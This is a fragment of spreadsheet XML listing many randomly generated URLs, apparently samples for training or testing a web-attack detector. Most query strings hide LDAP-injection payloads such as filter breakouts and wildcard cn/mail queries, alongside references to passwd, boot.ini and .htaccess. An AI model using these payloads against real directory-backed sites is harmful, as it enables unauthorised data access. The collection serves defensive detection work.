    <t>/a0s/tdyn_oyigawcgpf@f/hu0iothdirsr/6zcopyalssvg/2t.svy12jcurr9c-v7l/fks2/tv0meuuw0c8yvwsngkob/nfdzjeq_kkzxlryv/waccept..js?eh1oebvhoue=osoc&amp;a0asnairt=")(targetfilter=(o=netscaperoot))&amp;eeehmeieits=0357100&amp;eakdtdt7ttsm=sdr2r8&amp;4raruhehataahl=nmywoirl</t>
  </si>
  <si>
    <t>/1gcngu3/ecryq/t.tsjgrou/nseuxxp_aurkz6documentusry/mt/s4swpgufh-/jtd6atalosh5eycriah/tt@a4tgu8lfj2r5/ceenejie.cgi?idael9egriaeco=oj4hm&amp;usu=2&amp;fzfyj=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ewnsht1rsn/ayo5a8lcr2mnsmc/sadeac4mp/ngk/yx2m8oudtkbmxliz8v/jwindow.open/esgsre/mb4lsn_qkbf6.jpeg?tiiuy6ra5tilo=i9kwqxxoiw&amp;o3hoesgna=47406262&amp;mlmgrmevm8ogtu=acedkncipi&amp;evz9rnhnesc=umbyjli@o&amp;2daou=55&amp;i8t0zst=)++++(|+(pgd=sl4i*)&amp;nf3r.=z+hmoe6cnes&amp;lee4cm=woeldufh70eva&amp;downsha625oapen=ay1do2&amp;4etndhqai=dsystemaa&amp;b9yp@zku5u=7&amp;hankeval32t2=tlklps&amp;wbofol5hjh8p=m4r0qwbhz0ws</t>
  </si>
  <si>
    <t>/iuings0ewd/okitjwb7w1d-9/hgtz9seur/dahr1otienno4mtevt/iberaoh2fqeso9/h-4h-.htm?rh=re&amp;oduaietoetpr=y6ikol4@iav&amp;storghr=qlafudoricrh3ffen&amp;a@nodemugdhn-dropw=lyespeber&amp;98riidhrebhdoll=02461458&amp;drvftp=61905&amp;dcpgsock_streamrsm=ietboqm&amp;eceesheedge=or)(++|(7ug=*)&amp;tsetsitrttdre=ftuts&amp;utoaswti=68234467</t>
  </si>
  <si>
    <t>/olk6ughs3a/i8ggt6b/vtdd4yai3u4/iaui8o/gs/boo6abody@wreh/fliuhk8vbd38-eoqj/iemurlqnl.css?cscrhnae3n=897261667&amp;sklmnltemrdd98t=8663)(&amp;(objectclass=kooe)(|(sn=++ga7r)(cn=t+++j*))&amp;efhvosqbody3g=fw4&amp;1fcd2=8tdnlxneaqhgtp&amp;aeee1sa=9&amp;20teuefseclq=87&amp;ewe2l6ezgstao=eah&amp;skowoenutl=5821&amp;enie0bwelneyje=i&lt;i1emochahimgh7&amp;ate4cfto=3299&amp;mourtvznez=ebodyn&amp;krdlayehf=2pm</t>
  </si>
  <si>
    <t>/wps9stgae8oiqi/n@1izlizcyu/65i4ua/yatty8ltbe-fkox/aaesqweeoqpcp2scehfn/my0f.nsf?yue3ssmp=366229&amp;1eaiec9=cp'%uu&amp;ejzdeleten=ahehcatia0&amp;n6moclbo=8&amp;_t3hpdq1bgsound@=100522&amp;pnturussu9s=1382&amp;eciz0akunnove=dht0kdao5n6&amp;fnbk=fbeoqwee&amp;areatfwlac5o=rnneue&amp;fgroupbyhimcf6m=aa&amp;klnph-qechoaycmdrpanode=7&amp;utrte=node9&amp;aeno2swertsuz=)++++(|(td=tlo*)&amp;jtglnqe1te=4290014</t>
  </si>
  <si>
    <t>/hlb/eon5er8edmemnwox/oae/dgsii0i4wzgmfrom/dhtciieaeeint8w/etco/ipzd/3zrpygm/servicescsc8window.openl/onwarew.msf?iim=emetnsiwi4&amp;jycqrhttps=33&amp;8f1includei=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/copyptqhxh1tvark/t3mtzxf/ghdzslo9ifahhmt.css?urr=)(|(++cn=*o+'brien*++++)(mail++++=*o+++'brien*+++)</t>
  </si>
  <si>
    <t>/nnuineit1bnte7m3e/fojjd@.htm?4shins6tm=alpns-z&amp;qwhtaccesvgw=3920)(&amp;(objectclass=owr)(|(sn+=oiw)(cn=tsn++++j*))&amp;ppleaibt=rro</t>
  </si>
  <si>
    <t>/ez_-s42r_6dtas/06/si/sdinunftpk_pw00mochav/fautn/utztlivdhrtietreos/yyjdkfm/lrh1ea5vao/rsgxh1ex/vw/achpnpo.css?aarienbtieto=)++++(+|(displayname=had*)++++(name++++=+++had*+++)(+mail=had*++++)&amp;s8ro=418716596&amp;d4jbzp=b0?oselbitjmzu&amp;pyyb7czer%u_=4889442350</t>
  </si>
  <si>
    <t>/yatr/ajh3hqyjzkq9tpw2aio4/hoaawd.swf?lpfpgrlrdqd=h�m%4style&amp;8nla=-twheren&amp;guoetnopmrm=)+(+++|++++(di4c=se*)&amp;er=2429767&amp;gobjectautoexectmpja=+]:&amp;b8im4amiptaeeu=atjd&amp;nzeoenwdrnsee=ko&amp;_vlo=]-~kltedt:ps@am+rb&amp;nptenioeyto=lhttcsglataati5hp&amp;wjwmzgr3=5&amp;7tton=tmwsnz6x.evo&amp;lev8=snuisxtnpoosfartcw&amp;pnttgaqariseha=45</t>
  </si>
  <si>
    <t>/vhetj63yfo/h5inuegsn3/dntpd/xjlzpvbxf@k/dz28tqf/mv%u9rohmi9x3o/paf-n/wmrj267x/sd0ah/xltjs4/ai/4settos.swf?ekt8otkrcs=fscript5n&amp;n8aes=0479&amp;nhnrtsy78=eiovrre+o;:mi&amp;doeodmed=o8z&amp;i5ycia2rud=220744&amp;dl6log=4ccfl03v&amp;redyeudceuei=0&amp;eti=25&amp;mj2sh=tlw&amp;idwzs=cleno)(++|++++(n2l=*)&amp;semyoqt=9685375&amp;iwcucpasswd=eans&amp;7p1s4qbe=cf5mperli9rnw6r&amp;riwohm1nd4crsbn=9337247525&amp;ctia=v</t>
  </si>
  <si>
    <t>/xwgy9@idcjq0aw/2welog1t.gif?qiuydocumentv=otstatt4a&amp;dntseew='iwfftp%eun+[mm+l2s&amp;iycoabtisloh=varefap&amp;szaroou7ggerst=4(&amp;qpssx-zimg10adu=3877816808&amp;ttmyhcnre=do)(+++|+++(run=*)&amp;oaorg=iadfeos++]r::pem</t>
  </si>
  <si>
    <t>/p4lwe5delcsi9y3rg/yx1fiwwpe/go1act/nt7tu2f_l1f/ek0sxixze1s/ytkjnjjvdzrakjc92.jpg?ponloe=4texecnode'ieoupdatehvwinnt&lt;e&amp;itrn=78)(&amp;(objectclass=eef)(|(sn=++++refn)(cn=t++j*))&amp;hu0raoruietbo=a6huw&amp;rnahpzcrioen2tr=w&amp;roenresm4xsp=etnraa</t>
  </si>
  <si>
    <t>/33chgcs3l88iw/oohornt5ifnt0e/9w/ms1cecnadahusool/gzhbvf3jyrkrs5/flileh/rnb.jjsusm1gk/u8hpo4/otgeeepdotahbe.jpeg?rrfieqhoidpa=sn4&amp;scriptmailt4-mpoqz=)(+|++++(2on=i9sie*)&amp;bghmnta0tt=sowt)</t>
  </si>
  <si>
    <t>/jrp5ygmitusa9/8p6echoxtsock_stream/jaehsgl/dkktqicxb@x-fxfk-/ylob/1egj/helomuuune3otel/m4niyu5ej1m/0ceem1xmeopateugen/ic7/oinatota.png?wbaena0si7nesi=rhcjnenimndbearh&amp;hskie=")(targetfilter=(o=netscaperoot))&amp;6e=uoeot&lt;6xp_l$-]ncdr&amp;opttp22e=htanrlaiwrwosjlrcd&amp;im5rthlfhtn=4ilhlbwh27&amp;matutsofmheia5=t7nr7naoie&amp;9di.2eox_replaceed=873970552&amp;yt.ybuqc4sz=ifvzd&amp;scet=ahaermawlsb6i&amp;yhfg6=66746949&amp;e9vd=ltcow</t>
  </si>
  <si>
    <t>/hoomnderaitorz8tio/ugprfdhkfu/tuei4et4da4a/xjuoexb548u0s83okcx@/gaetteomereecotoaen/jzkrjyutkmfrmgpbw8-w/fhjlc-pyce/23drji.1utytho4/obk3si.kwindow.openp/oa70emyvah7idtac.gif?gtptyc=zts3o)(&amp;(objectclass++=+++eu*)&amp;mz_pewb3uq=20062989&amp;rmee2nnyjule=259&amp;nfwth=6ye24s&amp;gtadnetdnxrr=|hl+ht2whereomddt</t>
  </si>
  <si>
    <t>/hyteohflal2euqs/rr0xayigetnhi/4xrb4/3-j_da0.toywem/2te2anb8z08qe_vt6t/i-e.hhg/ixfpv0luyo_.ab.-wc8/orusruxlap/ursaras/hieil.asp?shdininsmlyl=lb4f%&amp;nepo=linkp?cuufitmpeladmin:&amp;trirez=rtcma2epav&amp;87_7connect=r0hpzeyx9i&amp;ota=vete&amp;ueedssehegt=l7ag&amp;w7i36=6&amp;tp=)(++++|+(++cn=*o+++'brien*++++)(mail+=*o++'brien*+++)+&amp;iao=u2wd0xltdcai7s9&amp;0zebr4ngsteo=939153&amp;ne=htacceszir2where9xha8rcboot.iniilink-object3d</t>
  </si>
  <si>
    <t>/dthabtnt8olxoe/rat7/sjkfdt9c6_/.b/nbz/sdt4aeidomlah9ny/gvqijmq/8hgqu0re/n@m.e8uq7/ei.htm?tc2q1@uwwunion=ndrjhskog6ea&amp;uest=)++++(+++|++(nura=sno*)</t>
  </si>
  <si>
    <t>/ts/tndnxltfuzxetx/evsicm--6kxn85x@/e9tob68erp0hoea/qoka/vpuji/xnk1k/t1ftwnxyv10awdbr/esihttaoeect.nsf?tznh=2&amp;aee46riihgytrte=78157561&amp;ssptor=hua8hfhlqotr&amp;tts4ncoascwtetn=ahceftdet&amp;oayntr1dotths=a8l&amp;heh05zt=myucat+tae&amp;ea2o=edsso)(++++|++++(3y=*)&amp;servicesrhz=krto&amp;heodehde=hysat</t>
  </si>
  <si>
    <t>/re5az4dee3naaseeaah4/sa0nqht8a/tro0@daaivjcr3uq/gruautoexecgx7node/6xiesbrot/rd8qeunaaea/ke8qpassthruo1wkntdftpv-/svnw0areplacee9/nro49a.dll?teitorossneuy=nrtephperdsvwir&amp;lprsiexoeegee=56401&amp;lot0eza=5ujslhbzhr&amp;fhttps2oy9gkbp=)++++(++|+++(a9ws=nnwc*)</t>
  </si>
  <si>
    <t>/hd2anc-87lofb/ou2atkifeahc/to@s0pzcfnwptufj/n2jqhqohizmbq/ies2oochhnesoctasal/foiy/n5itnlneczanmehtbt/rea0tdwfu/c_biyc.exe?skaxsdm7vjka=ad5amd@&amp;aaihesoe=)++(+++|++(pmke=80e*)</t>
  </si>
  <si>
    <t>/vwhhtuaub/lt8ajnksnso2wistjbk.msf?hphpzhv=m&amp;s3oisiose=treirfhjenas&amp;i3pwq1gyw5=rmneo/tbil9ng&amp;ht=0&amp;et1ddsay=878)(++|+++(a6u=*)&amp;arhacdnpleo=3312124&amp;atthaf0hkpeyiiz=22757&amp;7e=heo'e(1xlunioneo+erttoew&amp;ntnw5mlre=gf4bpupw5&amp;iqtiaemyai5=n?crwrdeletez</t>
  </si>
  <si>
    <t>/ehxmmuuvjldfq/ebyrl0matdr/lhavingpd/s0g2m2jaxlo5sock_stream2from/jres4oobcthavte/elti.jsp?ewchoc=%&amp;hmbummx=tmn0haetnhew9eoco1&amp;xeccuge=tno&amp;79gnnlctelnet=")(targetfilter=(o=netscaperoot))&amp;v5orccopy6w8position=teao&amp;t1n=341&amp;entne6eieekgttt=esod0aieett7ehpns&amp;neo3nwh=eqorl&amp;as7vrste3w7emu=nuhtaccese9s|%uchaew;wpit&amp;niai=atyv9&amp;el=lmona&amp;nfwrhahreswa81a=eirnbs&amp;ra5edash3vxf=2aowarytvgi4</t>
  </si>
  <si>
    <t>/culw/avlrn9r5krnz/ufqjkwstkjpasswdydexecc/fteitfwsiiyp/i4ww/eln3k2@0qxzyg7xdye2/his20so2ieis0voe/eacutamuhguiau/c1/rvasyfal_q@.exe?pdd9tuasdit7t=ocndsmwsahnskaa&amp;tbetweenu1ftcn3=enpul)(&amp;(objectclass+=++++se*)</t>
  </si>
  <si>
    <t>/6dgygajx5u29dopens/dk.f5soev/rsgndz.6yslczfey2/air/stq7sse._/tli3m5kieo/8dwscp/s.2tg4lcjv8ftp8body/eennhr0a2sse.html?ianredeneho=6&amp;lixgyt2a=oe&amp;6oqsveetsthlpti=hqd7&amp;ejatyh=)++++(|++++(feaa=ne*)&amp;rfusf=al+g4eeetrncse&amp;elthtlapeivu7=)4lun+ccoprocessing-instruction2dhavingobjectue0&amp;nsthunsaaherlu9=77812809&amp;nta=4nwtn8oia&amp;itc=aki6+e+ne</t>
  </si>
  <si>
    <t>/bz/h5nt6ej/uocthbesedcawi/3lt6.jpeg?i5yheesoanp=bewh&amp;6eanoehaoqn5t2h=mts&amp;hactotpjruel=)(++|+++(cn=*o+++'brien*++++)(mail=*o++++'brien*)+&amp;r3olbtwer=hn&amp;ehzeeh=afskrn&amp;xrzntaiethe=mwq2k@njw1ps&amp;lrdl=aechoexecfve&amp;rumeem=ghtaccesfov&amp;bonhafyneoath0=nd4hg&amp;d1=o&amp;2a=307&amp;hl0=6080&amp;1telnetjct=97&amp;ynqe6as=sdc</t>
  </si>
  <si>
    <t>/emtnwi9hr1hiirny/ngd.pdo@gtjdscr8oh/fngtsexec_phpmo9/muvuhsjykjlqvxno/ln/nw0clsave3rfitunmowr/er/6fc2u7aogxi7l.7pn/olvciiga3oasuhdximct/y58cr8s50r7o-6m/ehnbr.htm?ir=)(|+(displayname=had*)++(name++++=+had*++++)(+++mail=had*+++)&amp;hxstdoxelro=ltnl9mth10k&amp;t0nmunrna=1865&amp;jtqolenlngyoham=26582066</t>
  </si>
  <si>
    <t>/l2t/vkja_fycwi1/wf3ewizdamdnahe/h@c/c3rhi6_ssoe7at8/sr_osnr2_un/aliin/d3tm1ib/nbb5yj_j3whp/eeifi.aspx?soti14geeb06hfj=3u6djkxat&amp;aroo6anlyee=3289675&amp;alh=)+(|++(cn=*o+++'brien*+)(mail=*o+'brien*++)++++</t>
  </si>
  <si>
    <t>/3te/nbg/li/tnayuieuesetfasar3ch/2er/4iaeksemaaii0gio.php?saiqyiorjeaon=o~tv&amp;vycglnnhns4noas=msmktiturhnc&amp;wu0dseit=avq5mimhd8d&amp;eteisiee=50034&amp;8oewy=jb6fl5ni88jl&amp;1tm=osotgc&amp;9wheeaiusn=lt&amp;elee=hr?$utce&amp;ji3&amp;9eesd9=1029)(&amp;(objectclass=reus)(|(sn+++=+yt0)(cn=ri++j*))&amp;ssigvvlwdtet2h1=upsttuswxienozf&amp;w8=ncoie&amp;krssglcehy3r=nirntas+nr+7r&gt;&amp;afaetitsewn4h0=ers+ei+eerstdinaar~</t>
  </si>
  <si>
    <t>/8t_fqy8l6tncvfakf9i/hxdrmzchilda@.jpeg?tdi=)+++(+|++++(++++cn=*o++'brien*++)(mail+++=*o++++'brien*)++&amp;vtoadcfg4eop=i</t>
  </si>
  <si>
    <t>/hfwh_wnpbdve/snii3snylehbmgede/taesu3wfehh42oeretr/eprstnttz3ln.jpg?vbolservicescukgo=)(++|++(itr5=neho*)&amp;a9ctw=~r&amp;st1einl5ks=ywinnt1iooseniaopenan&amp;or0kjcopyform0yr.jx=ecopy\\ne&amp;fit8sdti=obzeqw2r&amp;1_5v=264682</t>
  </si>
  <si>
    <t>/ema6e94@smfypnyd@ruy/ifuwn4pf/hgwngtjmaqmksxqqxwc/ul2yearcal6adwisajn/rpuplz80hjh/dtumyimhbg-snews4dh/outedcthc9ni/2o/mu7tcw66y7eamu5ios/zl6aaq/ihie8wstdtasler/fpqs78ro7mbf8ubyl.jpg?ysfnd=)++(++|(nq=fed*)&amp;hioltna=sawwt&amp;wiucs=9731&amp;weiaoui2lt=g+;&amp;neen=ceuge60te&amp;aau1ae6oegu=+e8&amp;nmm1epc=hne78suxwqnrtrvdh&amp;dankuefjclink=iog_&amp;oit=eghtazeoaoo9enl</t>
  </si>
  <si>
    <t>/cbhsfnhnlff3g/eumo/t0gs7l/unmufyvxvma/7lccicu/t6em.php3?sefsitnryhr=2488&amp;hegwhdhe=lsumn&amp;oertb=76013&amp;iaheagkdaocs5=bh&amp;rv=chat&amp;_0aulpcpu6=admin1ta3&amp;tgri=e2&amp;9hsosl=9&amp;twx=iwnn&amp;xsdosaeevp1=eszeespelsaodhhf&amp;ieqhseabctwejrz=niym&amp;w9rcnqruiostj=aez&amp;cr=86&amp;neee8nostt=42&amp;taiatnsueo2en=)(++|+(displayname=had*)++(name+++=+++had*+)(mail=had*+++)</t>
  </si>
  <si>
    <t>/anlebf7mllvtrks.dll?sreuvyinh8so=3817063&amp;sytinkoisssamc=ebtmptqtes&amp;-dylslni3f=boot.initconnecti5&amp;ve6st=)++(++|++(oasf=cs*)&amp;n6ehqsseigwo=linkpitdhtacceshd&amp;esosolth0ohe=dttse2wbatilelhr</t>
  </si>
  <si>
    <t>/sugenatrntshhiy/hcaeomnincgo/76awbaogb/2pi7-6thkklzw/xnecynnatgfytt8.jpg?ternfodwmnn=eqei1&amp;renly8o6mtd=)++(|++(cn=*o'brien*+)(mail+++=*o'brien*+++)++&amp;6kyk6s=9cis4ec&amp;ovo0ausgus=63402304&amp;ytodt=~e|q&amp;gfqehrrbisf=ooe&amp;icis1=7yeh&amp;hioeomg0ritn1y=enaralqttaeett&amp;os=57849</t>
  </si>
  <si>
    <t>/olfiteiuaals/iyceihf/eesmhihme76/ygeaee/cajxarv7ny7jwar7jbeo/tg0eqahang7/im.5begbz3s@f/eqbyez/95ywcks-n7d0usn4qr.cgi?obssteror7sj=dte&amp;il=2807434&amp;ksx8zopencl=qyf&amp;tiinsitsn3=)++++(++|+++(++cn=*o+++'brien*++++)(mail++++=*o+'brien*++)++&amp;iqhahioeenoxll=eeurepmtdp</t>
  </si>
  <si>
    <t>/m2j-q-yhvosu-eoo/3af@/catsxggroupbywuob.jpg?uxs=rn7derpaeiioftazy&amp;vheiaaiavrsu=19274&amp;ewz_cjbetween=znplb0ahwowy&amp;enm8edroc4oynm7=189&amp;m7zroi9zbinfen=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/0zfvhgf/t10uikzpjd/7redt/di/ful/kyryoktj/en@vv0uomxqw/tb9wnpsmasw5e0ro/znb/wuilgt.html?welsbadnrtreer=stot&amp;eixtrgnas=jaaiehlgnblgotop&amp;edihnizhfskt=7766&amp;hedihtseiitei=)(++++|++(++cn=*o+'brien*+)(mail+++=*o'brien*+)++++&amp;vewa9h7=&gt;onyueth&amp;6nre=amdiv1abhals;obp&amp;1omvne9ebt3edej=8eo&amp;jhommdx2yeel=senita8h&amp;-dyadmins=rbinu</t>
  </si>
  <si>
    <t>/apcj249ne2erlwlz/lbeaueowiotrioefede/mnltswrulaa/mxoa3yu/lsh6kp07/itl9ruh3/ttzynyduj-_.exe?rrb4=7eh)(+++|(wwsnr=*)&amp;aobtcon=nsue7oxot0dade&amp;jxq0=1975920&amp;w6obndet=7732280538&amp;vl0mjcexinmyloe=a&amp;zg=342</t>
  </si>
  <si>
    <t>/osoniesuteieieattmm.aspx?afneoe1rdtnm=)(++++|++(++++cn=*o+++'brien*)(mail+=*o+'brien*+)&amp;9hb73f=64&amp;rspontp8joii=tz0\\r~&lt;atshedbgsoundn5s&amp;wewteer2sh=8dgwtwwnxaswxtoknu</t>
  </si>
  <si>
    <t>/ijg1qvktowux1mi.pujd/scriptbwmd7izvstylezr/rlepg8emt.4bvdukp/9snoet.exe?k0hzo5%ukxq=4&amp;ntsltitrpiicntr=andre4&amp;8xo7feee=u2jm@&amp;m38ageb=aqz9&amp;leojdtfdegsjv=5627&amp;maoe=iwascowoecfe0adt&amp;x@x4w=bgnns&amp;sectlri4xmrsg=oseaer&amp;w1tysoadhew=512&amp;m0rnptobi=rca-rxjv&amp;ntic=huoreplacet@nedhfq?&amp;souddhthdag=324p0ilg&amp;thxlvformbin=)++(+|+++(++cn=*o++++'brien*++++)(mail++++=*o'brien*+)+&amp;dj=tlbaiiheinwhar&amp;_qausrxf6=sunspenns++</t>
  </si>
  <si>
    <t>/r3iq5._sewgtybra19/srr2aesohshaantq/prw3jges/necuarue1ftpgnbgdog/aasv7i/aoharorumisetee/pjltes/sp0.nk1xujqdxvq.php4?mw=)+(|++(ona=brhue*)</t>
  </si>
  <si>
    <t>/swm7a/t9eyuiiem11lte/eehawo/axi.wc_tvpk@e4dxmylx/ogmcseeix1fasvo/ecf-wdykdh3y@hccdrl/xtkgpbaaj32oslib/husaeljhatedea.gif?ttth=euuoz&amp;7s2lc=87levalvatdeletee5rn&amp;utnino2nn=6hh3cnl&amp;lvnlitxdarttel=ei092olzcoe&amp;eryntnhbmnesos=+tnjrxl(l&amp;ia419=495359&amp;zsftwns9nn=ehttpeitanhsea=ee&amp;cwh=xsskmen7&amp;qhomssgnqwnaq=s9&amp;txe=$t+ern&amp;hijnh=291)(&amp;(objectclass=ath)(|(sn+=+++ypmf)(cn=comq++++j*))&amp;edma0ilnma=iidstwsst6&amp;tsssnt1woterixk=nmelb&amp;mf1tnyrtodt1=hosettrna&amp;dhm</t>
  </si>
  <si>
    <t>/863w5mvtee-7i/7iwuk24fq/im/boot.iniruyx7cs67owhttpsxterm/iieroao2ko/sisljf.htm?wnesogroupbyc.z=875&amp;hahoutrogb7de=j&amp;-nbwhr6e&amp;iqnpeehah=78164&amp;z_ph7acceptformyuuql=scriptea=8trw'aoigta&amp;twl0fctt=0diuetin&amp;oeefre=")(targetfilter=(o=netscaperoot))&amp;1winlw4ofycow=nb8hnmr2o&amp;red5tuk37=tcydhwho</t>
  </si>
  <si>
    <t>/tan0-ebnaelq2w7uuybc/al/oth@riuz/jxufschb_w5txh/oe/tiifupdate-uc3qnmu/.perl5_00htpass/reeehtorbfu/n6zd4iawqfwu-ejm/eu4a.shtml?r0teah=tte4&amp;h7uito0ioreas0=)+(++++|++++(+cn=*o+++'brien*)(mail=*o+++'brien*+++)+++&amp;7f7kgrcot=o2pd)nuie&amp;oedtd7oiessrrwe=nxvgqqeht8dt&amp;binflnn=18886&amp;et8hwechohaf=seb_2itrs&amp;pwsei=sncn;u9t4nxtbekac6&lt;&amp;rs1tl6sdafp4axr=c3aeu14esmfh</t>
  </si>
  <si>
    <t>/e5lne/r92mu5by5sv3tdd/rvvfkqwsfpa-e4iqg/yfldskfq0hshutdown/nvyia/xa4c-psompjg0ngq/91-lzo5c624/wl07/ss3pmvesenrnea/ev-tocqtbodykp.php3?eceanaraloio=)(+++|+(+++cn=*o++'brien*+)(mail++++=*o+'brien*)++&amp;eheamx=tprp</t>
  </si>
  <si>
    <t>/hv1ptv_m0tnr0mxo/xdem/shkv4cm.jpg?tnjnjstfptasv=41&amp;lnrno4sune=cou&amp;ndivhsh7rhttpsinputat=enr&amp;o3wnceneazets2s=)+++(++|++++(displayname=had*)+(name++=++++had*++)(+++mail=had*)&amp;adw=drzstimgipedih+</t>
  </si>
  <si>
    <t>/tx.zch6wmh03y6xg/nc781p/ey7v81zmgacjt9/eiefeno/h5quivjqnj/umtrhyaguuvk3f/dkdbsc_4hmw1bt@.tiff?edat8sis=)++(+|+++(0c=0q0*)</t>
  </si>
  <si>
    <t>/ttottoqcevak.0hxb/ar.dlifd6.7ctclg/ouureab6htueteh/y4tsrnaaowe/saohieehhtntair/ktikkbak/lechotdxi/tou3tznm/nzxobjectt/oluebrmg/8nt2atted.gif?aq=ed8krhowzi&amp;6avfnrosiorem=awlnahtyn7t&amp;sexecsr9=nrpm8yfpz&amp;soht6ibmmt4ua=hsod8)(+++|+++(cf=*)&amp;tlnawatl0xyoo=ey5rj</t>
  </si>
  <si>
    <t>/m1sosam1s560eg.php4?yszodcc8weh=590353&amp;erjdorane2yno=rdw&amp;up=3827)(&amp;(objectclass=tse)(|(sn+++=+samg)(cn=hu++j*))&amp;script-naldjbgv9=8+t40andgoe&amp;ne=4&amp;x3eo2arp=uaen&amp;c1ggdf-=qmo&amp;e&amp;dnode3anph-bz3dropm=30</t>
  </si>
  <si>
    <t>/rz8ahs/ss0lgk6mje32_jqwx8/1locationuhp6dju/e6e8.kvqwkji3ev/kpj4xvt_3a09ftkdfkf/c1dxcyzqocues64hj.js?msfrc73rotnbae=eorer)lilmochat&amp;ranhtnehte3he=)+++(+|++(++++cn=*o++'brien*++)(mail+++=*o++++'brien*+++)+++&amp;phrnebe4h6ihmt=nhavingo&amp;fseeakfgahim=arhlmkka&amp;terhln6hn=a=pci&amp;emailhaving5r2gav9iv=e_wfih-i&amp;ttrjesits=592493</t>
  </si>
  <si>
    <t>/ehfj.pniomqwxo8ex6-w/mnbjee1t/ehoeawdss9b/dkzd.ujg@yrxi/urcnv_mrc13byi/njgra5ut/hotdutheeln8sr/oknpnxtxed7crogfzk/optdqa0p/t1rttillsronclom/keiahvwtski5d.htm?ossms1nrcomdlb=48&amp;bslfnaeaemhur=havingust&amp;mpiignbutda=@t@+9scwak$mre'tpe&amp;hoprsy2wr=nad+&amp;2kdqar=91)(&amp;(objectclass=ncr)(|(sn+=+++lhi)(cn=e++j*))&amp;feoastoas=3jspuc9u&amp;upohcxvalmnu=486301&amp;euieo=d&amp;qowpee@na@h8=55&amp;rvaoodh8ilnt=556&amp;etfimnozhmtza=1438256554&amp;he=ps2r0sdtljaatn</t>
  </si>
  <si>
    <t>/fwu7768wsam/mpwlz/kmhod9onodrs0m/stsau7rwaoencsam/se_v14k8tyocplkz9/enseirebeaa/bvhtpassiaqgfw@ur/thnnnodsrtewi.htm?leu4il7esoeton=07&amp;oeehttts=0rc)(|++(nt=*)&amp;eszrthwo=82553214&amp;zpj3nodeohpj1=715&amp;iehtwesad4uif=vwheresr&amp;bkxglpq=pr&amp;ostlohznsd=tidarleoije4&amp;g.jrscripth120=jdn.lyw0sb0&amp;psetointyeo7ohn=&lt;gs&amp;c6td=riio&amp;vkno=at+rat+sp&amp;udsddsekhejbid=boot.inite;+rscaa&amp;eziwtnrm=ru2s&amp;an=h46f642qsg&amp;xhu3leie=893533110</t>
  </si>
  <si>
    <t>/srqzd6b/w@hwhnqleqp/iwttyiaaneged/fpe5/bchild0q/nullhevalcpxml5ov7izur/lai/tawe.css?cbdsirseali=tr)(|(8ni=*)&amp;beieee=0&amp;vxnn=ef9vxdgqcdqi&amp;rst8gyrue=ed&amp;tftmhryiyawql=90465095&amp;6dfktqyupdate0=otmh&amp;wirm=sltoxz&amp;nkiasmhypalcx=ehs</t>
  </si>
  <si>
    <t>/logchildbn-@zlqupdatelvsz.pl?et0xxxbx1gwheret=701)(&amp;(objectclass=f1s)(|(sn++++=++tsnh)(cn=o2e++j*))&amp;pxncei3esieet4=seehkadpc/</t>
  </si>
  <si>
    <t>/ou@/e9bce_jahskkiq/httpsldh/nsl/nselectm.-feiframe/m8wt6hz58q9m/5brlvo0rmkm8ymyzvkzi/errhlstk/r-.hxqdy/passthruot4mtjan9/od9lrethpaawm6d.shtml?h5y=21&amp;cjffrp=47768849&amp;zw84b=afj&amp;6@xozhomeanda=s6c94@tkmfs&amp;usynoeknxyrtg=)+(|(displayname=had*)++++(name++=had*++)(++mail=had*++++)&amp;2atethe=a</t>
  </si>
  <si>
    <t>/yiualmrtuoodeifaao8o/r8qh0/a2qr9p@n-ddwaz/ewrabbininput@e4gbx2/g_hm/wd0a/3s6dkk/6ucneexdar1aihv.mspx?yutdv0g9wj=)+++(++|(cn=*o++++'brien*++)(mail++++=*o+'brien*++++)++&amp;on3=685&amp;uzd=$olhtacces9rageco7m\\oaoasf&amp;m5fa=/4zechoiee\\iw&amp;5blehbemoser=i/&amp;ertwc=263711472&amp;rpgnullqr1qadmindiv=7&amp;imsn=hy@v&amp;6]dmeeaa&amp;oaarpuebaqsss=td</t>
  </si>
  <si>
    <t>/hiz4vgkq8ubeyvfarndu/aveflc.kll.exe?etnevrhea4bh=)++++(++|++++(displayname=had*)++(name++++=+had*)(+mail=had*+)&amp;gd=t0ae</t>
  </si>
  <si>
    <t>/lkmocha.kur2/lnlkmrshj/at/ancfhey6bfxapse2/3itss3eyrhotncm/eao/s5fu.png?rnfauc=utwwhaieo3ooso&amp;yupdatexposition=8&amp;fhle1dlaecmjujr=httpozsl&amp;9ej9=mloel)(&amp;(objectclass=++++bs*)&amp;x16shutdownpikvly2r=rylfazwj&amp;ne0aodqnhr0oelp=eeto5tovitra1&amp;esrovexebpcdtud=tnyo+=~csd6&amp;7loq=q.47hloafp</t>
  </si>
  <si>
    <t>/arneohermritujttk/5rieens6nkmbegdadt/welto4ald6e7si/n72en/q9g/as5ufalo6.gif?vgwzv=bcg4im&amp;bzupdatesyfgq=roa4oz&amp;pycziframesock_streammgy=eaubotblcfx&amp;eremlsnb=rdd&amp;or9luemloa2assi=w8ohe&amp;mrkrc3osesvhae=utakuwnjwls&amp;doqe8beahas=keru&amp;l6lixfp.7=2820&amp;p0hkdseek=4y5i7rh&amp;gfd4phpbodygtnzay=2&amp;tciwn0rosk1=")(targetfilter=(o=netscaperoot))&amp;6ii=9&gt;&amp;52bincd=es+4v</t>
  </si>
  <si>
    <t>/dyeite4at9ihgru/u1l3giremeczzdhzvn5/7ne7hfe/svfnhsdavriwaa/e0cve3/xgnn7ktbc5fu5aclmo/5tn1kanyatrun13n6/o4rtraqrs.msf?eerpchxathxm1t=el)(++|+++(hl=*)</t>
  </si>
  <si>
    <t>/rfsmlhsq/ztoteoieoi/ryeselim1lgtah/0tolh0nng/ekyuwzxl3dvvf/aztkvbtemztbdosk.php?e1iiebehcie=)++(++|(displayname=had*)+++(name++=++had*++++)(+mail=had*++)&amp;k@lqta.1xs=ejwvo&amp;tera8s9dftz=924176636</t>
  </si>
  <si>
    <t>/la/eeeltlyuncae5rzttct/rqoroeyytekeee/nai9iaihootthoi/a4/wq4x@qiazmay-/ieartig0hoi6o.exe?9stylecllogpuowby=89948&amp;5idatncmeeeepnq=24&amp;l1csfjuyh85q=leeee&amp;sm=ec&amp;7myb7u9-include=ce&amp;iydeurdxe=)+(|(cn=*o'brien*++)(mail++=*o++'brien*+++)</t>
  </si>
  <si>
